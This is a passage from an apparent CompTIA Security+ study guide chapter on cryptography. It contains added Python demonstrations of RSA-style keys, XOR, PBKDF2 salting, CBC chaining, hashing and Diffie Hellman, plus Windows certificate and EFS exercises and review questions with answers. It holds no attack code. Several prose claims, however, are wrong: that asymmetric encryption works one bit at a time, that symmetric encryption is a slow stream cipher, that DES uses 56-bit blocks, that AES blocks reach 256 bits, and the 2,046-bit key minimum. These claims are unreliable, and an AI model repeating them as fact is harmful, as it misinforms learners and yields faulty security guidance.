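def demo() -> dict:
    carol_pub, carol_priv = make_keypair(M31, M61)      # Carol's "white" pair
    george_pub, george_priv = make_keypair(M31, M89)    # George's pair
    note = b"pay Carol 5"                               # constructed sample
    c = encrypt(carol_pub, note)                        # Bob encrypts to Carol
    email = b"meeting at noon"                          # constructed sample
    sig = sign(george_priv, email)                      # George signs for Mary
    return {
        "carol_reads": decrypt(carol_priv, c, len(note)) == note,
        "mary_verifies": verify(george_pub, email, sig),
        "tamper_detected": not verify(george_pub, b"meeting at 1pm", sig),
    }


if __name__ == "__main__":
    print(demo())   # all three True
```

The two directions are the whole point: encryption uses the other person's public key and only their private key undoes it; a signature uses your own private key and anyone holding your public key can check it, which is exactly why the private key must never be given away.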

Exam tip:
I will always use someone else's public key to encrypt data. I will never give my private key away. It is like giving away my bank card; it will never happen.

Cryptography algorithms and their characteristics

If we look at symmetric and asymmetric keys, they use a cipher with a number of bits attached to it: the lower the number of bits, the faster the cipher; the higher the number of bits, the slower the cipher, but the one with the higher number of bits is stronger.

For example, we have two people who are going to complete a challenge—they are Usain Bolt, who is DES, a 56-bit key, and we have King Arthur wearing armor, who has an RSA of 4,096 bits. The first part of the challenge is a 100-meter dash and when Usain Bolt wins, King Arthur is held back by the weight of his armor and he is 90 meters behind. The second part of the challenge is a boxing match, and Usain keeps hitting King Arthur who keeps laughing at him as he is being protected by his armor. Then, out of the blue, King Arthur lands a knockout blow to Usain. Since the challenge was for charity and the result was a draw, they are both happy.

Concept:
The smaller the key, the faster it is, but it is more insecure. The higher the key, the slower it is, but it is more secure.

Symmetric algorithms

For the Security+ exam, you must know the characteristics of each of the symmetric algorithms, from when it is used to its key length. Remember, they will never ask you which key encrypts or decrypts, as the answer would always be the private key, also known as the shared key. Let us look at each of these in turn:

Asymmetric algorithms

Asymmetric algorithms use a PKI environment as they use two keys: a private key that is always kept and a Public key that is always given away. Let us now look at different asymmetric techniques:


Figure 9: Diffie Hellman

Diffie Hellman creates the keys used in the Internet Key Exchange (IKE); it uses UDP Port 500 to set up the secure session for the L2TP/IPSec VPN. Once the secure tunnel has been created, then the symmetric encrypted data flows down the tunnel.

Symmetric versus asymmetric analogy

If we think of encryption as playing table tennis where each person has just one bat and the pace is extremely fast, this is similar to symmetric encryption, as it uses one key.

Then, if we change the game and we give the players two bats, the first bat to stop the ball and then they must switch bats to return the ball, this would be much slower.

The same can be said for encryption; asymmetric is much more secure as it has two keys and uses Diffie Hellman, an asymmetric technique to set up a secure tunnel for the symmetric data. Symmetric encryption uses a block cipher where it encrypts large blocks of data much faster than the asymmetric technique.

XOR encryption

The exclusive OR (XOR) operation is a binary operator from Boolean algebra. This operator compares two bits and produces one bit in return:

This is the opposite to binary. For example, we are going to use the word tread in ASCII format and then we are going to insert a key using the word hello so that we can complete an XOR operation. See the following diagram:


Figure 10: XOR

XOR encryption is commonly used with AES, several symmetric ciphers, and a one-time pad.
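The XOR truth table and the tread/hello operation from Figure 10, as an added Python example that is not code from the book; the one-time pad function at the end goes one step beyond the figure to show the use the paragraph above mentions. The plaintext and key are the figure's own words; the function names are this example's own.

```python
import os

# Constructed sample matching the figure: plaintext "tread", key "hello".
PLAINTEXT = b"tread"
KEY = b"hello"


def xor_bit(a: int, b: int) -> int:
    """XOR truth table: the output is 1 only when the two input bits differ."""
    return a ^ b


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR each byte of data with the matching key byte (the key repeats if shorter).
    Applying the same key again undoes the operation: XOR is its own inverse."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def xor_rows(data: bytes, key: bytes) -> list:
    """Per-byte view like the figure: (char, key char, data bits, key bits, result bits)."""
    rows = []
    for i, b in enumerate(data):
        k = key[i % len(key)]
        rows.append((chr(b), chr(k), f"{b:08b}", f"{k:08b}", f"{b ^ k:08b}"))
    return rows


def one_time_pad(message: bytes) -> tuple:
    """One-time pad: a fresh random key as long as the message, used exactly once.
    Returns (ciphertext, key); XOR with the key again recovers the message."""
    key = os.urandom(len(message))
    return xor_bytes(message, key), key


if __name__ == "__main__":
    for row in xor_rows(PLAINTEXT, KEY):
        print(*row)
    ciphertext = xor_bytes(PLAINTEXT, KEY)
    print(ciphertext.hex())                 # 1c17090d0b
    print(xor_bytes(ciphertext, KEY))       # b'tread'
```

The same XOR is the building block inside AES rounds and inside the CBC chaining step described later in this chapter.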

Key stretching algorithms

The concept of key stretching is to insert a random set of characters to increase the size of the password hash, making it harder for a brute force attack:
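Salting and key stretching together, as an added Python example that is not code from the book. It uses PBKDF2-HMAC, one of the two tools the review answers name, from Python's standard library; the unsalted MD5 is included only as the contrast, because two users with the same password would store the same value and a pre-computed table would match it. The iteration count and record layout are this example's own assumptions.

```python
import hashlib
import hmac
import os

ITERATIONS = 200_000   # assumption for the example; the cost that slows down guessing


def unsalted_md5(password: str) -> str:
    """The pre-computable form a rainbow table targets: same password, same hash."""
    return hashlib.md5(password.encode()).hexdigest()


def stretch_password(password: str, salt=None, iterations: int = ITERATIONS) -> tuple:
    """Return (salt, derived_key): a random 16-byte salt plus PBKDF2-HMAC-SHA256
    run for `iterations` rounds. The salt makes equal passwords hash differently;
    the rounds make every guess cost the same work the defender pays once."""
    if salt is None:
        salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations, dklen=32)
    return salt, dk


def make_record(username: str, password: str) -> dict:
    """What a password store keeps: salt, iteration count and derived key, never the password."""
    salt, dk = stretch_password(password)
    return {"user": username, "salt": salt.hex(), "iterations": ITERATIONS, "hash": dk.hex()}


def check_password(record: dict, attempt: str) -> bool:
    """Re-derive with the stored salt and count, then compare in constant time."""
    _, dk = stretch_password(attempt, bytes.fromhex(record["salt"]), record["iterations"])
    return hmac.compare_digest(dk, bytes.fromhex(record["hash"]))


if __name__ == "__main__":
    print(unsalted_md5("password"))                 # identical for every user with this password
    alice = make_record("alice", "password")        # constructed sample records
    bob = make_record("bob", "password")
    print(alice["hash"] != bob["hash"])             # True: salts differ
    print(check_password(alice, "password"))        # True
```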

Cipher modes

There are different cipher modes; most symmetric keys use a block cipher and can encrypt a large amount of data quicker than asymmetric encryption. Let us look at these in turn:

Stream versus block cipher analogy

We have two teams of four people, each tasked with unloading a five-ton lorry full of skittles and placing them in a room on the bottom floor of a building.

In one lorry the skittles are in boxes; in the other the skittles have been placed loose and need to be bagged first. It is obvious that the team with the boxed skittles will win:


Figure 11: Cipher Block Chaining (CBC)

The next block of plaintext is XOR'd against the last encrypted block before you encrypt this block. When decrypting a ciphertext block, you need the XOR from the previous ciphertext block. If you are missing any blocks, then decryption cannot be done.
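The CBC chaining step just described, as an added Python example that is not code from the book: each plaintext block is XORed with the previous ciphertext block before it is encrypted, and decrypting any block needs the ciphertext block before it. Because Python's standard library has no AES, the block cipher here is a constructed toy keyed byte substitution that only stands in for a real cipher; the block size, key, IV and messages are likewise this example's own.

```python
import random

BLOCK = 4  # toy block size in bytes (AES uses 16)


def _sboxes(key: bytes) -> tuple:
    # Toy keyed byte substitution: a permutation of 0..255 derived deterministically
    # from the key. It stands in for AES so the chaining is visible; it is NOT a
    # secure cipher.
    rng = random.Random(key)
    sbox = list(range(256))
    rng.shuffle(sbox)
    inverse = [0] * 256
    for i, v in enumerate(sbox):
        inverse[v] = i
    return sbox, inverse


def block_encrypt(key: bytes, block: bytes) -> bytes:
    sbox, _ = _sboxes(key)
    return bytes(sbox[b ^ key[i % len(key)]] for i, b in enumerate(block))


def block_decrypt(key: bytes, block: bytes) -> bytes:
    _, inverse = _sboxes(key)
    return bytes(inverse[b] ^ key[i % len(key)] for i, b in enumerate(block))


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def pad(data: bytes) -> bytes:
    """PKCS#7-style padding so the data is a whole number of blocks."""
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data: bytes) -> bytes:
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def ecb_encrypt(key: bytes, plaintext: bytes) -> bytes:
    """No chaining: identical plaintext blocks give identical ciphertext blocks."""
    padded = pad(plaintext)
    return b"".join(block_encrypt(key, padded[i:i + BLOCK]) for i in range(0, len(padded), BLOCK))


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    padded = pad(plaintext)
    prev, out = iv, []
    for i in range(0, len(padded), BLOCK):
        c = block_encrypt(key, xor(padded[i:i + BLOCK], prev))   # XOR with last ciphertext, then encrypt
        out.append(c)
        prev = c
    return b"".join(out)


def cbc_decrypt_blocks(key: bytes, prev: bytes, ciphertext: bytes) -> bytes:
    """Decrypt consecutive blocks given the ciphertext block (or IV) that precedes them."""
    out = []
    for i in range(0, len(ciphertext), BLOCK):
        c = ciphertext[i:i + BLOCK]
        out.append(xor(block_decrypt(key, c), prev))                 # undo the chaining XOR
        prev = c
    return b"".join(out)


def cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    return unpad(cbc_decrypt_blocks(key, iv, ciphertext))


if __name__ == "__main__":
    key, iv = b"k3y!", b"IV!!"                     # constructed sample key and IV
    ct = cbc_encrypt(key, iv, b"pay 100 to Carol")
    print(cbc_decrypt(key, iv, ct))                # b'pay 100 to Carol'
    print(cbc_decrypt_blocks(key, ct[:4], ct[4:])) # tail decrypts given block 1 as the chaining value
```

The `cbc_decrypt_blocks` helper shows the dependency the paragraph describes: blocks two onwards can be recovered from ciphertext block one alone, but if that block is missing the first recovered block is garbage.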

Hashing and data integrity

Hashing is where the data inside a document is hashed using an algorithm such as Secure Hash Algorithm version 1 (SHA1) or MD5. This turns the data inside the file into a long text string known as a hash value; this is also known as a message digest.

If you copy a file so that you have two files containing the same data, and you hash both with the same hashing algorithm, they will always produce the same hash value. Please look at the following example:

Can you read data that has been hashed? Hashing does not hide the data, as a digitally signed email could still be read; it only verifies integrity. If you wish to stop someone reading the email in transit, you need to encrypt it.
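The same-data-same-hash rule above, and the hash-before/re-hash-after integrity check described later in this chapter under Supporting integrity, as an added Python example that is not code from the book. The "file" contents are a constructed sample, with a copy in which a single digit has been altered; the function names are this example's own.

```python
import hashlib

# Constructed sample "file" contents and a copy with one digit changed (100 -> 900).
ORIGINAL = b"Contract: pay 100 to Carol\n"
TAMPERED = b"Contract: pay 900 to Carol\n"

# Digest sizes the chapter quotes: MD5 128 bits, SHA-1 160 bits (SHA-256 for contrast).
DIGEST_BITS = {"md5": 128, "sha1": 160, "sha256": 256}


def digest(data: bytes, algorithm: str = "sha256") -> str:
    """Hex message digest: same data and same algorithm always give the same value."""
    return hashlib.new(algorithm, data).hexdigest()


def seal(data: bytes) -> dict:
    """Record the digests before an examination (the 'hash before' step)."""
    return {alg: digest(data, alg) for alg in DIGEST_BITS}


def verify_seal(data: bytes, sealed: dict) -> bool:
    """Re-hash afterwards and compare: any change to any byte fails the check."""
    return all(digest(data, alg) == value for alg, value in sealed.items())


def bits_differing(hex_a: str, hex_b: str) -> int:
    """How many output bits changed; for a one-byte input change, roughly half."""
    return bin(int(hex_a, 16) ^ int(hex_b, 16)).count("1")


if __name__ == "__main__":
    before = seal(ORIGINAL)
    print(verify_seal(bytes(ORIGINAL), before))     # True: an exact copy hashes the same
    print(verify_seal(TAMPERED, before))            # False: one digit changed
    print(bits_differing(digest(ORIGINAL), digest(TAMPERED)))   # about 128 of 256
```

Note that `ORIGINAL` stays readable throughout: the digest is computed from the data, but nothing about the data is hidden, which is the point the next paragraph makes.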

Comparing and contrasting basic concepts of cryptography

The most common asymmetric algorithms include the Diffie Hellman, which creates a secure session so that symmetric data can flow securely. An example of this would be the L2TP/IPsec VPN. RSA is the commonly used asymmetric algorithm that was the very first of its kind, creating public and private key pairs. Elliptic Curve Cryptography is an asymmetric algorithm used for the encryption of small mobile devices.

Asymmetric – PKI

Asymmetric keys are obtained from a CA. If you are selling products or services with external entities, then you need to obtain your X509s from a public CA, otherwise your internal certificates will not be accepted.

Asymmetric – weak/deprecated algorithms

SSL should now be deprecated as it is weak; an example of an exploit is the POODLE attack, which is a man-in-the-middle attack that exploits the vulnerabilities of SSL 3.0 in CBC mode. Asymmetric algorithms should not be using a key whose strength is 2046 bits or lower. However, an SSL VPN is the only VPN that uses an SSL certificate and works with legacy clients.

Asymmetric – ephemeral keys

Ephemeral keys are short-lived keys that are used for a one-time only session. There are two types of Diffie Hellman: Ephemeral (DHE) and Elliptic Curve Diffie Hellman Ephemeral (ECDHE). The other keys, used for other asymmetric and symmetric encryption, are known as static keys, as they have about a two-year lifespan.

Symmetric algorithm – modes of operation

Symmetric encryption is a stream cipher that encrypts data one bit at a time; this is easy to crack and is much slower than a block cipher. Block cipher mode takes blocks of data depending on the key and encrypts that data in blocks—this makes the encryption of a large amount of data much faster.

In an L2TP/IPSec VPN tunnel, we have a choice of three different versions of symmetric encryption; the weakest is DES, which has a 56-bit key, followed by Triple DES (3DES), which has a 168-bit key. The most secure is AES, as it can go from 128 bits up to 256 bits. Remember, symmetric encryption has only one key. It is much faster for encrypting a larger amount of data, but it needs Diffie Hellman, an asymmetric technique, to create a secure tunnel before it is used.

Symmetric encryption – stream versus block cipher

Symmetric encryption uses a block cipher, where blocks of data are encrypted. The key size determines how large the block of data is; for example, if I use DES, then I can only encrypt blocks of 56 bits, whereas AES can encrypt blocks of data of up to 256 bits.

Asymmetric encryption encrypts one bit at a time, therefore it is slower but more secure than symmetric encryption as it uses a larger key size and uses two keys: public and private.

Symmetric encryption – confusion

Confusion massively changes the input to the output by putting it through a non-linear table created by the key.

Symmetric encryption – secret algorithm

A secret key is the piece of information that is used to encrypt and decrypt messages in symmetric encryption.

Symmetric – session keys

A session key is an encryption and decryption key that is randomly generated to ensure the security of a communications session between a user and another computer or between two computers. A RADIUS server could create a session key for a user being authenticated.

Hashing algorithms

A hashing algorithm takes the data from a document and generates a hexadecimal value from that input. If you take the same data and hash it with the same algorithm, it will generate the same hash. In the Security+ exam, the hashing algorithms are SHA-1, which is 160 bits, and MD5, which is 128 bits. Hashing is a one-way function to ensure that the integrity of the data is intact.

Crypto service provider

A crypto service provider is a software library. For example, Microsoft uses the CryptoAPI and has providers such as:

Crypto module

A Crypto module is a combination of hardware or software that implements crypto functions such as digital signatures, encryption, random number generation, or decryption.

Protecting data

One of the key functions of a security team is to protect a company's data as it is difficult to put a cost value on lost data. Let us look at three types of data—when it is at rest, in use, and in transit:

Basic cryptographic terminology

The Security+ exam is full of cryptographic terminology, and in this section, we are going to look at these, starting with obfuscation, which makes the code obscure. Try asking your family and friends to say the word obfuscation and watch them struggle. It is aptly named as the word itself is very obscure! You must know the terminology thoroughly.

Obfuscation

Obfuscation is the process where you take source code and make it look obscure so that if it was stolen it would not be understood.

Pseudo random number generator

Pseudo Random Number Generator (PRNG) refers to an algorithm that uses mathematical formulas to produce sequences of random numbers. Random numbers can be used when generating data encryption keys.

Nonce

A nonce is an arbitrary number that can be used just once; it is often a random (https://en.wikipedia.org/wiki/Randomness) or pseudo-random (https://en.wikipedia.org/wiki/Pseudorandomness) number issued in an authentication protocol (https://en.wikipedia.org/wiki/Authentication_protocol) to ensure that old communications cannot be reused in replay attacks (https://en.wikipedia.org/wiki/Replay_attack).

Perfect forward secrecy

When a VPN makes a secure connection, a key exchange is made for each secure session, but it links to the server's private key. With perfect forward secrecy, there is no link between the session key and the server's private key, therefore even if the VPN server has been compromised, the attacker cannot use the server's private key to decrypt the session.
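The Diffie Hellman exchange from Figure 9 and the forward-secrecy property just described, as an added Python example that is not code from the book. A session keyed from fresh ephemeral exponents (DHE) is compared with one where the server reuses a long-term exponent: in the static case the server's private value plus the recorded public value reproduces the session key, which is exactly the link perfect forward secrecy removes. The group parameters are a constructed toy (a 127-bit Mersenne prime, far smaller than the IKE groups the VPN uses), and the function names are this example's own.

```python
import hashlib
import secrets

# Toy group: p = 2**127 - 1 (a Mersenne prime), generator 5. Real IKE groups use
# 2048-bit or larger primes; these constructed parameters only keep the numbers small.
P = 2**127 - 1
G = 5


def dh_keypair() -> tuple:
    """A private exponent x and the public value g^x mod p."""
    x = 2 + secrets.randbelow(P - 3)
    return x, pow(G, x, P)


def dh_session_key(own_private: int, peer_public: int) -> bytes:
    """Both sides arrive at g^(xy) mod p and hash it down to a symmetric key."""
    shared = pow(peer_public, own_private, P)
    return hashlib.sha256(shared.to_bytes(16, "big")).digest()


def ephemeral_session() -> tuple:
    """DHE: each side generates a fresh key pair for this session only.
    Returns (client_key, server_key, client_public) so the two sides can be compared."""
    c_priv, c_pub = dh_keypair()
    s_priv, s_pub = dh_keypair()            # thrown away after the session
    return dh_session_key(c_priv, s_pub), dh_session_key(s_priv, c_pub), c_pub


def static_session(server_static_private: int) -> tuple:
    """Static DH: the server reuses one long-term private exponent for every session."""
    c_priv, c_pub = dh_keypair()
    s_pub = pow(G, server_static_private, P)
    return dh_session_key(c_priv, s_pub), dh_session_key(server_static_private, c_pub), c_pub


def key_recoverable_from_static(server_static_private: int, recorded_client_public: int,
                                session_key: bytes) -> bool:
    """The link forward secrecy removes: with a static server exponent, that one
    value plus the client's recorded public value reproduces the session key."""
    return dh_session_key(server_static_private, recorded_client_public) == session_key


if __name__ == "__main__":
    ck, sk, _ = ephemeral_session()
    print(ck == sk)                                  # True: both sides agree
    print(ephemeral_session()[0] == ck)              # False: every session gets a new key
    static_priv, _ = dh_keypair()
    ck2, _, cpub = static_session(static_priv)
    print(key_recoverable_from_static(static_priv, cpub, ck2))   # True: no forward secrecy
```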

Security through obscurity

The concept of security through obscurity is to prevent anyone from outside the organization from knowing the architecture or design of the system or any of its components. The internal people are aware of the weaknesses of the system, but you want to prevent an outside person from knowing anything about the system. Obfuscation is a technique that makes the storing of source code unreadable.

Collision

If you hash the same data or password with MD5 or with SHA-1, then it will always create the same hash. Hashes are used to store passwords or digitally sign documents. A collision attack is where the attacker tries to match the hash; if the hash is matched, it is known as a collision, and this could compromise systems.

Steganography

Steganography is where a document, an image, an audio file, or a video file can be hidden inside another document, an image, an audio file, or a video file.

Diffusion

Diffusion is a technique where if you change one character of the input, it will change multiple bits of the output.

Implementation versus algorithm

In today's world, the security administrators need to look at how the company operates to ensure it is more secure. Do they want to implement smart cards for multifactor authentication or implement a VPN so that remote users can connect to the company securely? Do they need to implement a Data Loss Prevention (DLP) template to ensure that sensitive data cannot be emailed from the company?

Once the company vision has been decided, the security team then needs to look at the algorithms that they need. Normally, this would be the strongest possible; however, we need to ensure that the server has enough processing power to deal with any increase in key length. We should not be using a key of less than 2,046 bits, as it would be too insecure.

Common use cases for cryptography

The words use case in the Security+ exam just mean examples of when something is used. We are now going to look at examples of when different cryptography is used.

Supporting confidentiality

A company's data cannot be priced, and the disclosure of this data could cause grave danger to the company. If your competitors stole your secrets, they could beat you to the market and you would not get the rewards that you deserved. To prevent data from being accessed, we encrypt it to prevent it from being viewed and to prevent any protocol analyzer from reading the packets. When people access the company's network from a remote location, they should use an L2TP/IPSec VPN tunnel, using AES as the encryption, to create a secure tunnel across the internet and to prevent man-in-the-middle attacks. Encryption could be coupled with mandatory access control to ensure that data is secure and kept confidential.

Supporting integrity

There are two main reasons for ensuring integrity. The first would be to hash data stored on a file server so that it can be proved whether or not the data has been tampered with. This could also be the case for a forensic examination of a laptop seized by the police: the forensic scientist could hash the data before the examination and then re-hash it at the end to prove that he had not tampered with the data. The hash values should match.

Another method of proving integrity would be to digitally sign an email with your private key to prove to the recipient that it has not been tampered with in transit. Prior to this, you would have to send them your Public key to validate the email. This proves that the email has maintained its integrity and has not been tampered with in transit.

Supporting non-repudiation

When you digitally sign an email with your private key, you cannot deny that it was you as there is only one private key; this is known as non-repudiation. When two separate parties decide to do a business deal together, they may use a third party to create a digital contract, but parties would log in to where the contract was stored—once they digitally sign it, then it is legally binding.

Supporting obfuscation

When companies store their source code, they use obfuscation to make it obscure and so that it cannot be read by anyone who steals it. This is also known as security by obscurity, where you want to prevent third parties knowing about your IT systems and identifying any weaknesses in the system.

Low-power devices

Small IoT devices will need to use elliptic curve cryptography for encryption, as it uses a small key; they do not have the processing power for conventional encryption.

Low latency

When using encryption, we should use symmetric ciphers such as 3DES or AES to encrypt large amounts of data, because they both use block cipher encryption with a small key length compared to asymmetric keys, which have a minimum of 1,024 bits. The server will not have to use as much processing power, as the larger the key length, the more processing and possible latency can occur. We should implement network accelerator cards where there is a lot of encryption and decryption.

High resiliency

We should be using the most secure encryption algorithm to prevent the encryption key from being cracked by attackers. The more secure the encryption key, the longer and more processing power it will take to gain the encryption key. In an RSA encryption environment, we should use a key with at least 3,072 bits or higher. We should also look at implementing accelerator cards to reduce the amount of latency on the encryption or decryption.

Supporting authentication

A corporate environment should not use a single-factor username and password as it is not as secure as a multifactor. We should adopt at least two-factor authentication and use a smart card and PIN to make authentication more secure. Installing a RADIUS server adds an additional layer to authentication to ensure that authentication from the endpoints is more secure.

Resource versus security constraints

The stronger the encryption and the longer the key, the more processing power and memory the server needs. If the server does not have enough resources, it becomes vulnerable to a resource exhaustion attack, which causes the system to hang or even crash; the effect is the same as a denial-of-service attack. We must strike a balance between the hardware resources the server has and the amount of cryptographic processing we ask of it.

Practical exercises

For these three practical exercises, you need a Windows Server 2012/2016 domain controller. If you are a home user with a Windows 7, Windows 8.1, or Windows 10 desktop and no server, you can still complete the second exercise.

Practical exercise 1 – building a certificate server

  1. Log in to your Windows Server 2012/2016 domain controller and open Server Manager.

  2. Select Manage, then Add Roles and Features; click Next three times.

  3. On the Select server roles page, check the top box, Active Directory Certificate Services. Select the Add Features button, then click Next three times. Check the Certification Authority box, click Next, and then Install. This will take a few minutes; when it has finished, click Close.

  4. On the Server Manager toolbar, click the yellow triangle; this is a notification. In the post-deployment configuration notice, click the blue hyperlink Configure Active Directory Certificate Services. Click Next; on the Role Services page, check the Certification Authority box. After a few seconds the Next button becomes available; click Next twice. On the CA Type page, select Root CA and click Next three times. Under Common name for this CA, enter MyCA, click Next three times, then click Configure. After it is configured, click Close.

  5. On the Server Manager toolbar, click Tools, then Certification Authority. Expand MyCA on the left-hand side, then expand Issued Certificates; it should be empty, as no certificates have been issued yet. See the following screenshot:


Figure 12: Certificate authority

Practical exercise 2 – encrypting data with EFS and exporting the certificate

Follow these steps:

  1. Go to the desktop and create a folder called test.

  2. Inside the folder, create a text document called data.

  3. Right-click the folder called test, then select Properties.

  4. On the General tab, click Advanced, then check the box Encrypt contents to secure data. The test folder and the data file inside it should turn green; that means they are encrypted with EFS.

  5. Go to the Start button, type mmc, and select the icon with the red suitcase.

  6. Console1 should open. Select File, then Add/Remove Snap-in, select Certificates, click Add, click Next, and then Finish.

  7. Expand Certificates – Current User, then expand Personal. You should see an entry for an EFS certificate.

  8. Right-click the certificate and select All Tasks, then Export.

  9. The Certificate Export Wizard appears. Click Next. On the Export Private Key page, select Yes, export the private key, and click Next. You will see that the format is PKCS #12 (P12); click Next, check the Password box, enter the password 123 twice, and click Next. (123 is for this exercise only; because the file contains the private key, use a strong passphrase in practice.) On the File to Export page, call it PrivKey and save it to the desktop. Click Next and then Finish.

  10. The message The export was successful should appear.

  11. Repeat the export, but this time select No, do not export the private key, and save the file as PubKey.

  12. You should now see two files on the desktop. The public key has a .cer extension and looks like a certificate. The private key has a .pfx extension and looks like a letter being inserted into an envelope. Anyone who obtains the .pfx file and its password can decrypt your EFS files, so treat it as you would the private key itself.

Practical exercise 3 – revoking the EFS certificate

  1. Go to Server Manager, select Tools, and open Certification Authority.

  2. Expand Issued Certificates; you should now see an EFS certificate.

  3. Right-click the certificate and select All Tasks.

  4. Select Revoke Certificate and choose a reason.

You will now notice that it has moved from Issued Certificates to Revoked Certificates. Clients will not see the revocation until the CA publishes an updated CRL (or the OCSP responder picks it up), so in a real environment you would publish the CRL straight after revoking.

Review questions

  1. What type of certificate does a CA have?

  2. If I am going to use a CA internally, what type of CA should I use?

  3. If I want to carry out B2B activity with third-party companies or sell products on the web, what type of CA should I use?

  4. Why would I make my CA offline when not in use?

  5. Who builds the CA or intermediary authorities?

  6. Who signs the X.509 certificates?

  7. What can I use to prevent my CA being compromised and fraudulent certificates being issued?

  8. If two entities want to set up a cross certification, what must they set up first?

  9. What type of trust model does PGP use?

  10. How can I tell if my certificate is valid?

  11. If the CRL is going slow, what should I implement?

  12. Explain certificate stapling/OCSP stapling.

  13. What is the process of obtaining a new certificate?

  14. What is the purpose of the key escrow?

  15. What is the purpose of the HSM?

  16. What is the purpose of the DRA and what does it need to complete its role effectively?

  17. How can I identify each certificate?

  18. What type of file extension and format is a private certificate?

  19. What type of file extension and format is a public certificate?

  20. What format is a PEM certificate?

  21. What type of certificate can be used on multiple servers in the same domain?

  22. What type of certificate can be used on multiple domains?

  23. What should I do with my software to verify that is it original and not a fake copy?

  24. What is the purpose of extended validation of an X.509 certificate?

  25. What type of cipher is the Caesar cipher and how does it work if it uses ROT 4?

  26. What is encryption and what are the inputs and outputs called?

  27. What type of encryption will be used to encrypt large amounts of data?

  28. What is the purpose of Diffie Hellman?

  29. What is the first stage in any encryption, no matter if it is asymmetric or symmetric?

  30. If Carol is encrypting data to send to Bob, what key will they each use?

  31. If George encrypted data four years ago with an old CAC card, can he decrypt the data with his new CAC card?

  32. If Janet is digitally signing an email to send to John to prove that it has not been tampered with in transit, what key will they each use?

  33. What two things does digitally signing an email provide?

  34. What asymmetric encryption algorithm should I use to encrypt data on a smartphone?

  35. What shall I use to encrypt a military mobile telephone?

  36. Name two key stretching algorithms.

  37. What is the purpose of key stretching?

  38. What is the difference between stream and block cipher modes, and which one will you use to encrypt large blocks of data?

  39. What happens with cipher block chaining if I don't have all of the blocks?

  40. If I want to ensure the integrity of data, what shall I use? Name two algorithms.

  41. If I want to ensure the protection of data, what shall I use?

  42. Is a hash a one-way or two-way function, is it reversible?

  43. What type of man-in-the-middle attack is SSL 3.0 (CBC) vulnerable to?

  44. Explain why we would use Diffie Hellman Ephemeral (DHE) and Elliptic Curve Diffie Hellman Ephemeral (ECDHE).

  45. What are the strongest and weakest methods of encryption with a L2TP/IPSec VPN tunnel?

  46. What is the name of the key used to ensure the security of communications between a computer and a server or a computer to another computer?

  47. What should I do to protect data-at-rest on a laptop?

  48. What should I do to protect data-at-rest on a tablet or smartphone?

  49. What should I do to protect data-at-rest on a backend server?

  50. What should I do to protect data-at-rest on a removable device such as a USB flash drive or an external hard drive?

  51. What two protocols could we use to protect data-in-transit?

  52. How can you protect data-in-use?

  53. What is the purpose of obfuscation?

  54. What is the purpose of perfect forward secrecy?

  55. What type of attack tries to find two hash values that match?

  56. What is the purpose of rainbow tables?

  57. Explain the concept of steganography.

  58. What are the two purposes of data loss prevention?

  59. What is the purpose of salting a password?

Answers and explanations

  1. A CA has a root certificate that it uses to sign the certificates it issues.

  2. I would use a private CA for internal use only; these certificates will not be accepted outside of your organization.

  3. I would use a public CA for B2B activities and public websites, as its root is already trusted by third parties.

  4. You keep the root CA offline when it is not being used so that it cannot be compromised; this is especially important for military, security, or banking organizations. Day-to-day issuing is then done by an online intermediate CA, so that the root key is only ever used to sign intermediates and CRLs.

  5. An architect would build the CA or intermediary authorities.

  6. The CA signs the X.509 certificates.

  7. Certificate pinning can be used so that a client accepts only the expected certificate or public key for a service; a fraudulent certificate issued by a compromised CA would then be rejected.

  8. If two separate PKI entities want to set up a cross certification, the Root CAs would set up a trust model between themselves, known as a bridge trust model.

  9. PGP uses a trust model known as a Web of Trust.

  10. A Certificate Revocation List (CRL) is used to determine if a certificate is valid.

  11. If the CRL is going slow, an OCSP is used as it provides faster validation.

  12. OCSP stapling is where the web server fetches a time-stamped OCSP response for its own certificate from the CA and attaches (staples) it to the TLS handshake, so the client gets fast revocation status without having to contact the CA or download the CRL.

  13. To obtain a new certificate, you generate a key pair and create a Certificate Signing Request (CSR) containing the public key and your identity details; the CSR is sent to the CA, which validates it and sends back the signed X.509 certificate. The private key never leaves the requester.

  14. The key escrow stores and manages private keys for third parties.

  15. A hardware security module (HSM) is a tamper-resistant device that securely generates, stores, and manages keys; a key escrow uses one to hold the escrowed private keys.

  16. When a user's private key is corrupted or lost, the data recovery agent (DRA) recovers the data; to do this it needs a copy of the user's private key from the key escrow.

  17. Each certificate carries a serial number that is unique within the issuing CA (it is the value a CRL lists when the certificate is revoked); its fields, extensions, and policies are identified by object identifiers (OIDs).

  18. A private certificate (one that includes the private key) is in P12 (PKCS #12) format with a .pfx extension.

  19. A public certificate is in P7B (PKCS #7) format with a .cer extension.

  20. A PEM certificate is in a Base64 format.

  21. A wildcard certificate can be used on multiple servers in the same domain.

  22. A Subject Alternative Name (SAN) certificate can be used on multiple domains.

  23. Code signing software is similar to hashing the software and ensuring the integrity of the software.

  24. Extended validation is normally used by financial institutions, as the CA performs a higher level of identity checking before issuing the X.509 certificate. Older browsers showed a green URL bar when it was used; current browsers no longer give it any special display.

  25. The Caesar cipher is a substitution cipher; with ROT 4 each letter is replaced by the letter four places further along the alphabet, wrapping round from Z to A.

  26. Encryption takes plaintext as its input and produces ciphertext as its output.

  27. Symmetric encryption is used to encrypt large amounts of data, as it uses one key and is much faster than asymmetric encryption.

  28. Diffie-Hellman is an asymmetric key agreement that lets two parties establish a shared secret over an insecure channel; in an IPSec VPN it is used during the IKE phase, which runs over UDP port 500, to set up the tunnel.

  29. The first stage in encryption is key exchange. With asymmetric encryption, each entity gives the other its public key; the private key is kept secure and never given away.

  30. Carol uses Bob's public key to encrypt the data and Bob uses his private key to decrypt it. Encryption and decryption are always done with the two halves of the same key pair.

  31. No. George must obtain the old private key to decrypt the data, as it was encrypted with a different key pair from the one on his new CAC card.

  32. Janet digitally signs the email with her private key and John checks its validity with Janet's public key, which he would have received in advance.

  33. A digital signature provides both integrity and non-repudiation.

